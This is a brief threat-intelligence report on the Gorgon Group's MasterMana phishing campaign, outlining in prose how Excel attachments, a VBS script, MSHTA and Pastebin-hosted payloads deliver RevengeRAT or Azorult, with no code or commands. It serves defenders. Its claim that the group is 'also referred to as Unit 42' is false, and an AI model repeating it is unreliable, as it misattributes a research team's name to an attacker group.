Gorgon Group: The Gorgon Group has been identified with high confidence by researchers at Prevailon to be behind the MasterMana campaign. The group is using the campaign to deliver the Azorult and RevengeRAT (Remote Access Trojan) to victims via phishing emails. Gorgon is a known state-sponsored group that is believed to be connected to Pakistan and is also referred to as Unit 42. The newest campaign is seen as primarily focused on financial gain and is being delivered to victims through a phishing email that bundles Microsoft Excel attachments, which drop a VBS script payload. The script opens a BlogSpot website that will launch a Microsoft HTML Applications Host (MSHTA) utility, opening a second payload hosted on Pastebin. The second payload is designed to kill any running Microsoft Excel, Word, PowerPoint and Publisher process and also set up scheduled tasks and registry keys for persistence. From here, two different cases are possible: In one instance, the campaign is delivering the RevengeRAT which is capable of opening remote shells, allowing an attacker to manage system files and services as well as edit the windows registry, log keystrokes, access the webcam, and harvest credentials. In the other case, the campaign drops the Azorult Trojan which is designed to exfiltrate as much sensitive information from victims as possible, including but not limited to, banking credentials, cryptocurrency wallets and files, passwords, browser history, and cookies. According to Prevailon, the group struck a “perfect balance” in this campaign, making it small enough to go undetected but still operating at a high rate.
This attack campaign can be seen as a “budget” campaign due to the low cost the group has to carry out attacks. The group used predominately free services from their email addresses and they use Pastebin to download payloads. The group also used an older trojan that cost approximately $100, making their cost for this campaign virtually zero. It possible that since the campaign is exposed, the group will find another low-budget RAT to use and continue using the other free services to keep operating costs low during their attacks. If IT and security staff fail to update defenses to detect this attack, it is also possible that the group will continue to use the same attack tools as long as they keep working.